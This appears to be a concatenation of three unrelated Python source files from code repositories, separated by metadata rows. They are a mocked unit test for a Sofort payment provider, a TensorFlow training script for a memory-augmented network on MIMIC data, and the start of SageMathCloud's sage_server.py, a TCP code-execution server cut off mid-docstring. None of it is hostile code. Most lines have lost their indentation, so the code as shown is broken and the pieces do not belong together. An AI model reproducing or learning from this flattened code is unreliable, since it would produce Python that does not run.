from .. import RedirectNeeded
SECRET = 'abcd1234'
CLIENT_ID = '1234'
PROJECT_ID = 'abcd'
class Payment(Mock):
id = 1
    variant = 'sofort'
currency = 'USD'
total = 100
status = 'waiting'
transaction_id = None
captured_amount = 0
billing_first_name = 'John'
def get_process_url(self):
return 'http://example.com'
def get_failure_url(self):
return 'http://cancel.com'
def get_success_url(self):
return 'http://success.com'
def change_status(self, status):
self.status = status
class TestSofortProvider(TestCase):
def setUp(self):
self.payment = Payment()
self.provider = SofortProvider(
id=CLIENT_ID, project_id=PROJECT_ID, key=SECRET)
@patch('xmltodict.parse')
@patch('requests.post')
def test_provider_raises_redirect_needed_on_success(
self, mocked_post, mocked_parser):
response = MagicMock()
response.status_code = 200
mocked_post.return_value = response
mocked_parser.return_value = {
'new_transaction': {
'payment_url': 'http://payment.com'}}
with self.assertRaises(RedirectNeeded) as exc:
self.provider.get_form(self.payment)
@patch('xmltodict.parse')
@patch('requests.post')
@patch('payments.sofort.redirect')
def test_provider_redirects_on_success(
self, mocked_redirect, mocked_post, mocked_parser):
transaction_id = '1234'
request = MagicMock()
request.GET = {'trans': transaction_id}
mocked_parser.return_value = {
'transactions': {
'transaction_details': {
'status': 'ok',
'sender': {
'holder': 'John Doe',
'country_code': 'EN'}}}}
self.provider.process_data(self.payment, request)
self.assertEqual(self.payment.status, 'confirmed')
self.assertEqual(self.payment.captured_amount, self.payment.total)
self.assertEqual(self.payment.transaction_id, transaction_id)
@patch('xmltodict.parse')
@patch('requests.post')
@patch('payments.sofort.redirect')
def test_provider_redirects_on_failure(
self, mocked_redirect, mocked_post, mocked_parser):
transaction_id = '1234'
request = MagicMock()
request.GET = {'trans': transaction_id}
mocked_parser.return_value = {}
self.provider.process_data(self.payment, request)
self.assertEqual(self.payment.status, 'rejected')
self.assertEqual(self.payment.captured_amount, 0)
self.assertEqual(self.payment.transaction_id, transaction_id)
@patch('xmltodict.parse')
@patch('requests.post')
def test_provider_refunds_payment(self, mocked_post, mocked_parser):
self.payment.extra_data = json.dumps({
'transactions': {
'transaction_details': {
'status': 'ok',
'sender': {
'holder': 'John Doe',
'country_code': 'EN',
'bic': '1234',
'iban': 'abcd'}}}})
mocked_parser.return_value = {}
self.provider.refund(self.payment)
self.assertEqual(self.payment.status, 'refunded')
| bsd-3-clause | -8,422,943,295,853,516,000 | 32.27619 | 74 | 0.589868 | false |
thaihungle/deepexp | meta_mann/run_mimic.py | 1 | 7331 | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # No logging TF
import tensorflow as tf
import numpy as np
import time
import sys
from mann import memory_augmented_neural_network
from Utils.mimic_gen import MimicGenerator
from Utils.Metrics import accuracy_instance2
from Utils import label_encoder as le
NUM_GPU=2
def omniglot():
# sess = tf.InteractiveSession()
    ## Global variables (hyperparameters follow the Omniglot MANN setup, reused here for the MIMIC task)
nb_reads = 4
controller_size = 200 # hidden dim for controller
memory_shape = (1024, 128)
batch_size = 16
train_max_iter = 100000
# Load Data
generator = MimicGenerator('./data/mimic/small/', batch_size=batch_size)
input_ph = tf.placeholder(dtype=tf.float32, shape=(batch_size, generator.num_step, generator.input_size)) # (batch_size, time, input_dim)
target_ph = tf.placeholder(dtype=tf.float32, shape=(batch_size, generator.num_step, generator.output_size)) # (batch_size, time)(label_indices)-->later convert onehot
output_var, output_var_flatten, params = memory_augmented_neural_network(input_ph, target_ph, batch_size=batch_size,
nb_class=generator.output_size,
memory_shape=memory_shape,
controller_size=controller_size,
input_size=generator.input_size, nb_reads=nb_reads)
print('Compiling the Model')
with tf.variable_scope("Weights", reuse=True):
W_key = tf.get_variable('W_key', shape=(nb_reads, controller_size, memory_shape[1]))
b_key = tf.get_variable('b_key', shape=(nb_reads, memory_shape[1]))
W_add = tf.get_variable('W_add', shape=(nb_reads, controller_size, memory_shape[1]))
b_add = tf.get_variable('b_add', shape=(nb_reads, memory_shape[1]))
W_sigma = tf.get_variable('W_sigma', shape=(nb_reads, controller_size, 1))
b_sigma = tf.get_variable('b_sigma', shape=(nb_reads, 1))
#W_gamma = tf.get_variable('W_gamma', shape=(controller_size, 1))
#b_gamma = tf.get_variable('b_gamma', shape=[1])
W_xh = tf.get_variable('W_xh', shape=(generator.input_size + generator.output_size, 4 * controller_size))
b_h = tf.get_variable('b_xh', shape=(4 * controller_size))
W_o = tf.get_variable('W_o', shape=(controller_size + nb_reads * memory_shape[1], generator.output_size))
b_o = tf.get_variable('b_o', shape=(generator.output_size))
W_rh = tf.get_variable('W_rh', shape=(nb_reads * memory_shape[1], 4 * controller_size))
W_hh = tf.get_variable('W_hh', shape=(controller_size, 4 * controller_size))
# gamma = tf.get_variable('gamma', shape=[1], initializer=tf.constant_initializer(0.95))
params = [W_key, b_key, W_add, b_add, W_sigma, b_sigma, W_xh, W_rh, W_hh, b_h, W_o, b_o]
# output_var = tf.cast(output_var, tf.int32)
target_ph_oh = target_ph
print('Output, Target shapes: {} {}'.format(output_var.get_shape().as_list(), target_ph_oh.get_shape().as_list()))
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=output_var, labels=target_ph_oh), name="cost")
opt = tf.train.AdamOptimizer(learning_rate=1e-3)
# opt = tf.train.RMSPropOptimizer(learning_rate=1e-4,momentum=0.9)
train_step = opt.minimize(cost, var_list=params)
accuracies = accuracy_instance2(tf.round(output_var), target_ph, batch_size=generator.batch_size)
#
# #average number of predicts on each class (should be equal = nb_sample_per_class)
# sum_out = tf.reduce_sum(
# tf.reshape(tf.one_hot(tf.round(output_var, axis=2), depth=base_code*base_code), (-1, base_code*base_code)),
# axis=0)
print('Done')
tf.summary.scalar('cost', cost)
# for i in range(generator.nb_samples_per_class):
# tf.summary.scalar('accuracy-' + str(i), accuracies[i])
tf.summary.scalar('accuracy', accuracies)
merged = tf.summary.merge_all()
t0 = time.time()
scores, accs = [], 0
init=tf.global_variables_initializer()
# 'Saver' op to save and restore all the variables
saver = tf.train.Saver()
model_path = './tmp/mimic_save/'
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)
with tf.Session(config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False,
device_count={'CPU': 10, 'GPU':NUM_GPU},
gpu_options=gpu_options),
) as sess:
try:
saver.restore(sess, model_path)
print("Model restored from file")
except Exception as e:
print('no thing to be loaded')
sess.run(init)
# writer = tf.summary.FileWriter('/tmp/tensorflow', graph=tf.get_default_graph())
train_writer = tf.summary.FileWriter('./tmp/mimic_train_report/', sess.graph)
test_writer = tf.summary.FileWriter('./tmp/mimic_test_report/', sess.graph)
print ('Training the model')
try:
for i, (batch_input, batch_output) in generator:
start=time.time()
feed_dict = {
input_ph: batch_input,
target_ph: batch_output
}
# print batch_input.shape, batch_output.shape
if i<train_max_iter:
train_step.run(feed_dict)
score = cost.eval(feed_dict)
acc = accuracies.eval(feed_dict)
# yp = tf.round(output_var).eval(feed_dict)
# yr = target_ph.eval(feed_dict)
# x = generator.decode_onehot_input(batch_input)
# yp = generator.decode_onehot_output(yp)
# yr = generator.decode_onehot_output(yr)
# print('with x ... = {}, we have: \n {} vs {}'.format(x[0], yp,yr))
summary = merged.eval(feed_dict)
if i<train_max_iter:
train_writer.add_summary(summary, i)
else:
test_writer.add_summary(summary, i)
generator.is_training=False
print('time {} s for this loop {}'.format(time.time()-start,str(i)+ ' '+ str(acc)))
scores.append(score)
accs += acc
if i > 0 and not (i % 100):
print(accs / 100.0)
print('Episode %05d: %.6f' % (i, np.mean(scores)))
scores, accs = [], 0
if i > 0 and not (i%1000):
save_path = saver.save(sess, model_path)
print("Model saved in file: %s" % save_path)
le.chars2id={}
except KeyboardInterrupt:
print (str(time.time() - t0))
pass
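# Usage (illustrative): `python run_mimic.py gpu` or `python run_mimic.py cpu`;
# the first command-line argument picks the TensorFlow device and defaults to CPU.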
if __name__ == '__main__':
try:
device_name = sys.argv[1] # Choose device from cmd line. Options: gpu or cpu
print(device_name)
except Exception as e:
device_name = "cpu"
if device_name == "gpu":
print('use gpu')
device_name = "/gpu:0"
else:
print('use cpu')
device_name = "/cpu:0"
with tf.device(device_name):
omniglot()
| mit | -2,511,329,116,676,375,600 | 41.871345 | 171 | 0.56718 | false |
timothyclemansinsea/smc | src/smc_sagews/smc_sagews/sage_server.py | 1 | 74536 | #!/usr/bin/env python
"""
sage_server.py -- unencrypted forking TCP server.
Note: I wrote functionality so this can run as root, create accounts on the fly,
and serve sage as those accounts. Doing this is horrendous from a security point of
view, and I'm definitely not doing this. None of that functionality is actually
used in https://cloud.sagemath.com!
For debugging, this may help:
killemall sage_server.py && sage --python sage_server.py -p 6000
"""
# NOTE: This file is GPL'd
# because it imports the Sage library. This file is not directly
# imported by anything else in Salvus; the Python process it runs is
# used over a TCP connection.
#########################################################################################
# Copyright (C) 2013 William Stein <[email protected]> #
# #
# Distributed under the terms of the GNU General Public License (GPL), version 2+ #
# #
# http://www.gnu.org/licenses/ #
#########################################################################################
# Add the path that contains this file to the Python load path, so we
# can import other files from there.
import os, sys, time
# used for clearing pylab figure
pylab = None
# Maximum number of distinct (non-once) output messages per cell; when this number is
# exceeded, an exception is raised; this reduces the chances of the user creating
# a huge unusable worksheet.
MAX_OUTPUT_MESSAGES = 256
# stdout, stderr, html, etc. that exceeds this many characters will be truncated to avoid
# killing the client.
MAX_STDOUT_SIZE = MAX_STDERR_SIZE = MAX_CODE_SIZE = MAX_HTML_SIZE = MAX_MD_SIZE = MAX_TEX_SIZE = 40000
MAX_OUTPUT = 150000
# We import the notebook interact, which we will monkey patch below,
# first, since importing later causes trouble in sage>=5.6.
import sagenb.notebook.interact
# Standard imports.
import json, resource, shutil, signal, socket, struct, \
tempfile, time, traceback, pwd
import sage_parsing, sage_salvus
uuid = sage_salvus.uuid
def unicode8(s):
# I evidently don't understand Python unicode... Do the following for now:
# TODO: see http://stackoverflow.com/questions/21897664/why-does-unicodeu-passed-an-errors-parameter-raise-typeerror for how to fix.
try:
return unicode(s, 'utf8')
except:
try:
return unicode(s)
except:
return s
LOGFILE = os.path.realpath(__file__)[:-3] + ".log"
PID = os.getpid()
from datetime import datetime
def log(*args):
#print("logging to %s"%LOGFILE)
try:
debug_log = open(LOGFILE, 'a')
mesg = "%s (%s): %s\n"%(PID, datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3], ' '.join([unicode8(x) for x in args]))
debug_log.write(mesg)
debug_log.flush()
except:
log("an error writing a log message (ignoring)")
# Determine the info object, if available. There's no good reason
# it wouldn't be available, unless a user explicitly deleted it, but
# we may as well try to be robust to this, especially if somebody
# were to try to use this server outside of cloud.sagemath.com.
_info_path = os.path.join(os.environ['SMC'], 'info.json')
if os.path.exists(_info_path):
INFO = json.loads(open(_info_path).read())
else:
INFO = {}
if 'base_url' not in INFO:
INFO['base_url'] = ''
# Configure logging
#logging.basicConfig()
#log = logging.getLogger('sage_server')
#log.setLevel(logging.INFO)
# A CoffeeScript version of this function is in misc_node.coffee.
import hashlib
def uuidsha1(data):
sha1sum = hashlib.sha1()
sha1sum.update(data)
s = sha1sum.hexdigest()
t = 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'
r = list(t)
j = 0
for i in range(len(t)):
if t[i] == 'x':
r[i] = s[j]; j += 1
elif t[i] == 'y':
# take 8 + low order 3 bits of hex number.
r[i] = hex( (int(s[j],16)&0x3) |0x8)[-1]; j += 1
return ''.join(r)
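# Illustrative, hand-checked example of the deterministic mapping above:
#   uuidsha1('hello') == 'aaf4c61d-dbc5-4e8a-adab-ede0f3b482cd'
# since sha1('hello') == 'aaf4c61ddbc5e8a2dabede0f3b482cd9aea9434d'.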
# A tcp connection with support for sending various types of messages, especially JSON.
class ConnectionJSON(object):
def __init__(self, conn):
assert not isinstance(conn, ConnectionJSON) # avoid common mistake -- conn is supposed to be from socket.socket...
self._conn = conn
def close(self):
self._conn.close()
def _send(self, s):
length_header = struct.pack(">L", len(s))
self._conn.send(length_header + s)
def send_json(self, m):
m = json.dumps(m)
log(u"sending message '", truncate_text(m, 256), u"'")
self._send('j' + m)
return len(m)
def send_blob(self, blob):
s = uuidsha1(blob)
self._send('b' + s + blob)
return s
def send_file(self, filename):
log("sending file '%s'"%filename)
f = open(filename, 'rb')
data = f.read()
f.close()
return self.send_blob(data)
def _recv(self, n):
#print("_recv(%s)"%n)
for i in range(20): # see http://stackoverflow.com/questions/3016369/catching-blocking-sigint-during-system-call
try:
#print "blocking recv (i = %s), pid=%s"%(i, os.getpid())
r = self._conn.recv(n)
#log("n=%s; received: '%s' of len %s"%(n,r, len(r)))
return r
except socket.error as (errno, msg):
#print("socket.error, msg=%s"%msg)
if errno != 4:
raise
raise EOFError
def recv(self):
n = self._recv(4)
if len(n) < 4:
raise EOFError
n = struct.unpack('>L', n)[0] # big endian 32 bits
s = self._recv(n)
while len(s) < n:
t = self._recv(n - len(s))
if len(t) == 0:
raise EOFError
s += t
if s[0] == 'j':
try:
return 'json', json.loads(s[1:])
except Exception as msg:
log("Unable to parse JSON '%s'"%s[1:])
raise
elif s[0] == 'b':
return 'blob', s[1:]
raise ValueError("unknown message type '%s'"%s[0])
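# A minimal hedged sketch (added for illustration; the server itself only uses
# ConnectionJSON above) of the wire format: each frame is a 4-byte big-endian
# length, then a one-character type tag ('j' for JSON, 'b' for blob) + payload.
def _example_write_json_frame(sock, mesg):
    # `sock` is assumed to be a connected socket.socket; this mirrors
    # ConnectionJSON._send + send_json, minus logging.
    payload = 'j' + json.dumps(mesg)
    sock.send(struct.pack('>L', len(payload)) + payload)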
def truncate_text(s, max_size):
if len(s) > max_size:
return s[:max_size] + "[...]", True
else:
return s, False
def truncate_text_warn(s, max_size, name):
r"""
Truncate text if too long and format a warning message.
INPUT:
- ``s`` -- string to be truncated
    - ``max_size`` -- integer truncation limit
    - ``name`` -- string, name of limiting parameter
OUTPUT:
a triple:
- string -- possibly truncated input string
- boolean -- true if input string was truncated
- string -- warning message if input string was truncated
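    EXAMPLE (illustrative)::
        truncate_text_warn('abcdef', 3, 'MAX_DEMO')
        # -> ('abc[...]', True, "WARNING: Output: 6 truncated by MAX_DEMO to 3. ...")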
"""
tmsg = "WARNING: Output: %s truncated by %s to %s. Type 'smc?' to learn how to raise the output limit."
lns = len(s)
if lns > max_size:
tmsg = tmsg%(lns, name, max_size)
return s[:max_size] + "[...]", True, tmsg
else:
return s, False, ''
class Message(object):
def _new(self, event, props={}):
m = {'event':event}
for key, val in props.iteritems():
if key != 'self':
m[key] = val
return m
def start_session(self):
return self._new('start_session')
def session_description(self, pid):
return self._new('session_description', {'pid':pid})
def send_signal(self, pid, signal=signal.SIGINT):
return self._new('send_signal', locals())
def terminate_session(self, done=True):
return self._new('terminate_session', locals())
def execute_code(self, id, code, preparse=True):
return self._new('execute_code', locals())
def execute_javascript(self, code, obj=None, coffeescript=False):
return self._new('execute_javascript', locals())
def output(self, id,
stdout = None,
stderr = None,
code = None,
html = None,
javascript = None,
coffeescript = None,
interact = None,
md = None,
tex = None,
d3 = None,
file = None,
raw_input = None,
obj = None,
once = None,
hide = None,
show = None,
events = None,
clear = None,
delete_last = None,
done = False # CRITICAL: done must be specified for multi-response; this is assumed by sage_session.coffee; otherwise response assumed single.
):
m = self._new('output')
m['id'] = id
t = truncate_text_warn
did_truncate = False
import sage_server # we do this so that the user can customize the MAX's below.
if code is not None:
code['source'], did_truncate, tmsg = t(code['source'], sage_server.MAX_CODE_SIZE, 'MAX_CODE_SIZE')
m['code'] = code
if stderr is not None and len(stderr) > 0:
m['stderr'], did_truncate, tmsg = t(stderr, sage_server.MAX_STDERR_SIZE, 'MAX_STDERR_SIZE')
if stdout is not None and len(stdout) > 0:
m['stdout'], did_truncate, tmsg = t(stdout, sage_server.MAX_STDOUT_SIZE, 'MAX_STDOUT_SIZE')
if html is not None and len(html) > 0:
m['html'], did_truncate, tmsg = t(html, sage_server.MAX_HTML_SIZE, 'MAX_HTML_SIZE')
if md is not None and len(md) > 0:
m['md'], did_truncate, tmsg = t(md, sage_server.MAX_MD_SIZE, 'MAX_MD_SIZE')
if tex is not None and len(tex)>0:
tex['tex'], did_truncate, tmsg = t(tex['tex'], sage_server.MAX_TEX_SIZE, 'MAX_TEX_SIZE')
m['tex'] = tex
if javascript is not None: m['javascript'] = javascript
if coffeescript is not None: m['coffeescript'] = coffeescript
if interact is not None: m['interact'] = interact
if d3 is not None: m['d3'] = d3
if obj is not None: m['obj'] = json.dumps(obj)
if file is not None: m['file'] = file # = {'filename':..., 'uuid':...}
if raw_input is not None: m['raw_input'] = raw_input
if done is not None: m['done'] = done
if once is not None: m['once'] = once
if hide is not None: m['hide'] = hide
if show is not None: m['show'] = show
if events is not None: m['events'] = events
if clear is not None: m['clear'] = clear
if delete_last is not None: m['delete_last'] = delete_last
if did_truncate:
if 'stderr' in m:
m['stderr'] += '\n' + tmsg
else:
m['stderr'] = '\n' + tmsg
return m
def introspect_completions(self, id, completions, target):
m = self._new('introspect_completions', locals())
m['id'] = id
return m
def introspect_docstring(self, id, docstring, target):
m = self._new('introspect_docstring', locals())
m['id'] = id
return m
def introspect_source_code(self, id, source_code, target):
m = self._new('introspect_source_code', locals())
m['id'] = id
return m
message = Message()
whoami = os.environ['USER']
def client1(port, hostname):
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect((hostname, int(port)))
conn = ConnectionJSON(conn)
conn.send_json(message.start_session())
typ, mesg = conn.recv()
pid = mesg['pid']
print("PID = %s" % pid)
id = 0
while True:
try:
code = sage_parsing.get_input('sage [%s]: '%id)
if code is None: # EOF
break
conn.send_json(message.execute_code(code=code, id=id))
while True:
typ, mesg = conn.recv()
if mesg['event'] == 'terminate_session':
return
elif mesg['event'] == 'output':
if 'stdout' in mesg:
sys.stdout.write(mesg['stdout']); sys.stdout.flush()
if 'stderr' in mesg:
print('! ' + '\n! '.join(mesg['stderr'].splitlines()))
if 'done' in mesg and mesg['id'] >= id:
break
id += 1
except KeyboardInterrupt:
print("Sending interrupt signal")
conn2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn2.connect((hostname, int(port)))
conn2 = ConnectionJSON(conn2)
conn2.send_json(message.send_signal(pid))
del conn2
id += 1
conn.send_json(message.terminate_session())
print("\nExiting Sage client.")
class BufferedOutputStream(object):
def __init__(self, f, flush_size=4096, flush_interval=.1):
self._f = f
self._buf = ''
self._flush_size = flush_size
self._flush_interval = flush_interval
self.reset()
def reset(self):
self._last_flush_time = time.time()
def fileno(self):
return 0
def write(self, output):
self._buf += output
#self.flush()
t = time.time()
if ((len(self._buf) >= self._flush_size) or
(t - self._last_flush_time >= self._flush_interval)):
self.flush()
self._last_flush_time = t
def flush(self, done=False):
if not self._buf and not done:
# no point in sending an empty message
return
self._f(self._buf, done=done)
self._buf = ''
def isatty(self):
return False
# This will *have* to be re-done using Cython for speed.
class Namespace(dict):
def __init__(self, x):
self._on_change = {}
self._on_del = {}
dict.__init__(self, x)
def on(self, event, x, f):
if event == 'change':
if x not in self._on_change:
self._on_change[x] = []
self._on_change[x].append(f)
elif event == 'del':
if x not in self._on_del:
self._on_del[x] = []
self._on_del[x].append(f)
    def remove(self, event, x, f):
        # lists have no .find(); use a membership test and drop the callback if present
        if event == 'change' and x in self._on_change:
            v = self._on_change[x]
            if f in v:
                v.remove(f)
            if len(v) == 0:
                del self._on_change[x]
        elif event == 'del' and x in self._on_del:
            v = self._on_del[x]
            if f in v:
                v.remove(f)
            if len(v) == 0:
                del self._on_del[x]
def __setitem__(self, x, y):
dict.__setitem__(self, x, y)
try:
if x in self._on_change:
for f in self._on_change[x]:
f(y)
if None in self._on_change:
for f in self._on_change[None]:
f(x, y)
except Exception as mesg:
print(mesg)
def __delitem__(self, x):
try:
if x in self._on_del:
for f in self._on_del[x]:
f()
if None in self._on_del:
for f in self._on_del[None]:
f(x)
except Exception as mesg:
print(mesg)
dict.__delitem__(self, x)
def set(self, x, y, do_not_trigger=None):
dict.__setitem__(self, x, y)
if x in self._on_change:
if do_not_trigger is None:
do_not_trigger = []
for f in self._on_change[x]:
if f not in do_not_trigger:
f(y)
if None in self._on_change:
for f in self._on_change[None]:
f(x,y)
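# Hedged usage sketch (illustrative only; nothing in the server calls this):
# Namespace fires the callbacks registered via on() whenever a key is set or deleted.
def _example_namespace_listeners():
    ns = Namespace({})
    ns.on('change', 'x', lambda val: log("x changed to", val))
    ns['x'] = 5                         # triggers the listener above
    ns.set('x', 6, do_not_trigger=[])   # set() can suppress chosen callbacks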
class TemporaryURL:
def __init__(self, url, ttl):
self.url = url
self.ttl = ttl
def __repr__(self):
return repr(self.url)
def __str__(self):
return self.url
namespace = Namespace({})
class Salvus(object):
"""
Cell execution state object and wrapper for access to special SageMathCloud functionality.
An instance of this object is created each time you execute a cell. It has various methods
for sending different types of output messages, links to files, etc. Type 'help(smc)' for
more details.
OUTPUT LIMITATIONS -- There is an absolute limit on the number of messages output for a given
cell, and also the size of the output message for each cell. You can access or change
those limits dynamically in a worksheet as follows by viewing or changing any of the
following variables::
sage_server.MAX_STDOUT_SIZE # max length of each stdout output message
sage_server.MAX_STDERR_SIZE # max length of each stderr output message
sage_server.MAX_MD_SIZE # max length of each md (markdown) output message
sage_server.MAX_HTML_SIZE # max length of each html output message
sage_server.MAX_TEX_SIZE # max length of tex output message
sage_server.MAX_OUTPUT_MESSAGES # max number of messages output for a cell.
And::
sage_server.MAX_OUTPUT # max total character output for a single cell; computation
# terminated/truncated if sum of above exceeds this.
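    For example (illustrative), to allow more total output per cell::
        import sage_server
        sage_server.MAX_OUTPUT = 10**6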
"""
Namespace = Namespace
_prefix = ''
_postfix = ''
_default_mode = 'sage'
def _flush_stdio(self):
"""
Flush the standard output streams. This should be called before sending any message
that produces output.
"""
sys.stdout.flush()
sys.stderr.flush()
def __repr__(self):
return ''
def __init__(self, conn, id, data=None, cell_id=None, message_queue=None):
self._conn = conn
self._num_output_messages = 0
self._total_output_length = 0
self._output_warning_sent = False
self._id = id
self._done = True # done=self._done when last execute message is sent; e.g., set self._done = False to not close cell on code term.
self.data = data
self.cell_id = cell_id
self.namespace = namespace
self.message_queue = message_queue
self.code_decorators = [] # gets reset if there are code decorators
# Alias: someday remove all references to "salvus" and instead use smc.
# For now this alias is easier to think of and use.
namespace['smc'] = namespace['salvus'] = self # beware of circular ref?
# Monkey patch in our "require" command.
namespace['require'] = self.require
# Make the salvus object itself available when doing "from sage.all import *".
import sage.all
sage.all.salvus = self
    def _send_output(self, *args, **kwds):
        if self._output_warning_sent:
            raise KeyboardInterrupt
        mesg = message.output(*args, **kwds)
        # Import here (not at module load) so users can customize the MAX limits at
        # runtime; it must happen before the 'once' branch, since the module is also
        # referenced unconditionally below when checking MAX_OUTPUT.
        import sage_server
        if not mesg.get('once',False):
            self._num_output_messages += 1
            if self._num_output_messages > sage_server.MAX_OUTPUT_MESSAGES:
self._output_warning_sent = True
err = "\nToo many output messages: %s (at most %s per cell -- type 'smc?' to learn how to raise this limit): attempting to terminate..."%(self._num_output_messages , sage_server.MAX_OUTPUT_MESSAGES)
self._conn.send_json(message.output(stderr=err, id=self._id, once=False, done=True))
raise KeyboardInterrupt
n = self._conn.send_json(mesg)
self._total_output_length += n
if self._total_output_length > sage_server.MAX_OUTPUT:
self._output_warning_sent = True
err = "\nOutput too long: %s -- MAX_OUTPUT (=%s) exceeded (type 'smc?' to learn how to raise this limit): attempting to terminate..."%(self._total_output_length, sage_server.MAX_OUTPUT)
self._conn.send_json(message.output(stderr=err, id=self._id, once=False, done=True))
raise KeyboardInterrupt
def obj(self, obj, done=False):
self._send_output(obj=obj, id=self._id, done=done)
return self
def link(self, filename, label=None, foreground=True, cls=''):
"""
Output a clickable link to a file somewhere in this project. The filename
path must be relative to the current working directory of the Python process.
The simplest way to use this is
salvus.link("../name/of/file") # any relative path to any file
This creates a link, which when clicked on, opens that file in the foreground.
If the filename is the name of a directory, clicking will instead
open the file browser on that directory:
salvus.link("../name/of/directory") # clicking on the resulting link opens a directory
If you would like a button instead of a link, pass cls='btn'. You can use any of
the standard Bootstrap button classes, e.g., btn-small, btn-large, btn-success, etc.
If you would like to change the text in the link (or button) to something
besides the default (filename), just pass arbitrary HTML to the label= option.
INPUT:
- filename -- a relative path to a file or directory
- label -- (default: the filename) html label for the link
- foreground -- (default: True); if True, opens link in the foreground
- cls -- (default: '') optional CSS classes, such as 'btn'.
EXAMPLES:
Use as a line decorator::
%salvus.link name/of/file.foo
Make a button::
salvus.link("foo/bar/", label="The Bar Directory", cls='btn')
Make two big blue buttons with plots in them::
plot(sin, 0, 20).save('sin.png')
plot(cos, 0, 20).save('cos.png')
for img in ['sin.png', 'cos.png']:
salvus.link(img, label="<img width='150px' src='%s'>"%salvus.file(img, show=False), cls='btn btn-large btn-primary')
"""
path = os.path.abspath(filename)[len(os.environ['HOME'])+1:]
if label is None:
label = filename
id = uuid()
self.html("<a class='%s' style='cursor:pointer'; id='%s'></a>"%(cls, id))
s = "$('#%s').html(obj.label).click(function() {%s; return false;});"%(id, self._action(path, foreground))
self.javascript(s, obj={'label':label, 'path':path, 'foreground':foreground}, once=False)
def _action(self, path, foreground):
if os.path.isdir(path):
action = "worksheet.project_page.chdir(obj.path);"
if foreground:
action += "worksheet.project_page.display_tab('project-file-listing');"
else:
action = "worksheet.project_page.open_file({'path':obj.path, 'foreground': obj.foreground});"
return action
def open_tab(self, filename, foreground=True):
"""
Open a new file (or directory) document in another tab.
See the documentation for salvus.link.
"""
path = os.path.abspath(filename)[len(os.environ['HOME'])+1:]
self.javascript(self._action(path, foreground),
obj = {'path':path, 'foreground':foreground}, once=True)
def close_tab(self, filename):
"""
        Close an open file tab. The filename is relative to the current working directory.
"""
self.javascript("worksheet.editor.close(obj)", obj = filename, once=True)
def threed(self,
g, # sage Graphic3d object.
width = None,
height = None,
frame = True, # True/False or {'color':'black', 'thickness':.4, 'labels':True, 'fontsize':14, 'draw':True,
# 'xmin':?, 'xmax':?, 'ymin':?, 'ymax':?, 'zmin':?, 'zmax':?}
background = None,
foreground = None,
spin = False,
aspect_ratio = None,
frame_aspect_ratio = None, # synonym for aspect_ratio
done = False,
renderer = None, # None, 'webgl', or 'canvas'
):
from graphics import graphics3d_to_jsonable, json_float as f
# process options, combining ones set explicitly above with ones inherited from 3d scene
opts = { 'width':width, 'height':height,
'background':background, 'foreground':foreground,
'spin':spin, 'aspect_ratio':aspect_ratio,
'renderer':renderer}
extra_kwds = {} if g._extra_kwds is None else g._extra_kwds
# clean up and normalize aspect_ratio option
if aspect_ratio is None:
if frame_aspect_ratio is not None:
aspect_ratio = frame_aspect_ratio
elif 'frame_aspect_ratio' in extra_kwds:
aspect_ratio = extra_kwds['frame_aspect_ratio']
elif 'aspect_ratio' in extra_kwds:
aspect_ratio = extra_kwds['aspect_ratio']
if aspect_ratio is not None:
if aspect_ratio == 1 or aspect_ratio == "automatic":
aspect_ratio = None
elif not (isinstance(aspect_ratio, (list, tuple)) and len(aspect_ratio) == 3):
raise TypeError("aspect_ratio must be None, 1 or a 3-tuple, but it is '%s'"%(aspect_ratio,))
else:
aspect_ratio = [f(x) for x in aspect_ratio]
opts['aspect_ratio'] = aspect_ratio
for k in ['spin', 'height', 'width', 'background', 'foreground', 'renderer']:
if k in extra_kwds and not opts.get(k,None):
opts[k] = extra_kwds[k]
if not isinstance(opts['spin'], bool):
opts['spin'] = f(opts['spin'])
opts['width'] = f(opts['width'])
opts['height'] = f(opts['height'])
# determine the frame
b = g.bounding_box()
xmin, xmax, ymin, ymax, zmin, zmax = b[0][0], b[1][0], b[0][1], b[1][1], b[0][2], b[1][2]
fr = opts['frame'] = {'xmin':f(xmin), 'xmax':f(xmax),
'ymin':f(ymin), 'ymax':f(ymax),
'zmin':f(zmin), 'zmax':f(zmax)}
if isinstance(frame, dict):
for k in fr.keys():
if k in frame:
fr[k] = f(frame[k])
fr['draw'] = frame.get('draw', True)
fr['color'] = frame.get('color', None)
fr['thickness'] = f(frame.get('thickness', None))
fr['labels'] = frame.get('labels', None)
if 'fontsize' in frame:
fr['fontsize'] = int(frame['fontsize'])
elif isinstance(frame, bool):
fr['draw'] = frame
# convert the Sage graphics object to a JSON object that can be rendered
scene = {'opts' : opts,
'obj' : graphics3d_to_jsonable(g)}
# Store that object in the database, rather than sending it directly as an output message.
# We do this since obj can easily be quite large/complicated, and managing it as part of the
# document is too slow and doesn't scale.
blob = json.dumps(scene, separators=(',', ':'))
uuid = self._conn.send_blob(blob)
# flush output (so any text appears before 3d graphics, in case they are interleaved)
self._flush_stdio()
# send message pointing to the 3d 'file', which will get downloaded from database
self._send_output(id=self._id, file={'filename':unicode8("%s.sage3d"%uuid), 'uuid':uuid}, done=done)
def d3_graph(self, g, **kwds):
from graphics import graph_to_d3_jsonable
self._send_output(id=self._id, d3={"viewer":"graph", "data":graph_to_d3_jsonable(g, **kwds)})
def file(self, filename, show=True, done=False, download=False, once=False, events=None, raw=False, text=None):
"""
Display or provide a link to the given file. Raises a RuntimeError if this
        is not possible, e.g., if the file is too large.
If show=True (the default), the browser will show the file,
or provide a clickable link to it if there is no way to show it.
If text is also given that will be used instead of the path to the file.
If show=False, this function returns an object T such that
T.url (or str(t)) is a string of the form "/blobs/filename?uuid=the_uuid"
that can be used to access the file even if the file is immediately
deleted after calling this function (the file is stored in a database).
Also, T.ttl is the time to live (in seconds) of the object. A ttl of
0 means the object is permanently available.
raw=False (the default):
If you use the URL
/blobs/filename?uuid=the_uuid&download
then the server will include a header that tells the browser to
download the file to disk instead of displaying it. Only relatively
small files can be made available this way. However, they remain
available (for a day) even *after* the file is deleted.
NOTE: It is safe to delete the file immediately after this
function (salvus.file) returns.
raw=True:
Instead, the URL is to the raw file, which is served directly
from the project:
/project-id/raw/path/to/filename
